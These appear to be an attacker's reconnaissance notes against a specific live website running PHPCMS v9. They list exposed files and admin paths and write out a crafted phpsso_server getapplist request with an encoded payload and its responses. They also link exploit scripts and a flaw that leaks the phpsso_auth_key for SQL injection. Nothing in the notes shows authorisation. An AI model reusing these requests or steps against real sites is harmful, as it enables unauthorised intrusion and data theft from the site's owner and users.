Approach
By chance, I found https://www.17xwg.com
Below are the clues I found:
1. https://www.17xwg.com/content-11-798-1.html#comment_iframe Use of the # character
2. https://www.17xwg.com/robots.txt
#
# robots.txt for PHPCMS v9
#
User-agent: *
allow: /sitemaps.xml
Disallow: /caches
Disallow: /phpcms
Disallow: /install
Disallow: /phpsso_server
Disallow: /api
Disallow: /admin.php
3. https://www.17xwg.com/bdunion.txt
09c34f67a8c9bcb9a111df10c43c9e02
https://www.17xwg.com/log.txt
Returns a large number of values
4. The reason CAPTCHA verification keeps failing
<label>验证码</label>
<input class="login_input" type="text" size="4" name="code">
<img id="code_img" src="http://admwg.17xwg.com/phpsso_server/api.php?op=checkcode&code_len=4&font_size=14&width=84&height=24&font=&font_color=&background=" onclick="this.src=this.src+"&"+Math.random()">
</span>
5. https://www.17xwg.com/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=662dCAZSAwgFUlUJBAxbVQJXVghTWVQHVFMEV1MRX11cBFMKBFMGHkUROlhBTVFuW1FJBAUVBwIXRlgeERUHQVlIUVJAA0lRXABSQEwNXAhZVl5V
Returns 0
Including https://www.17xwg.com/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=662dCAZSAwgFUlUJBAxbVQJXVghTWVQHVFMEV1MRX11cBFMKBFMGHkUROlhBTVFuW1FJBAUVBwIXRlgeERUHQVlIUVJAA0lRXABSQEwNXAhZVl5V
Returns aaaaa()
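6. https://zhuanlan.zhihu.com/p/26263513
Use of exp script forwarding
7. https://blog.csdn.net/wodafa/article/details/70596538
Someone else's hands-on experience
8. https://www.secpulse.com/archives/30536.html
A design flaw allows the phpsso_auth_key to be obtained (usable for SQL injection, etc.)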
uid=x&ps_auth_key=phpsso_auth_key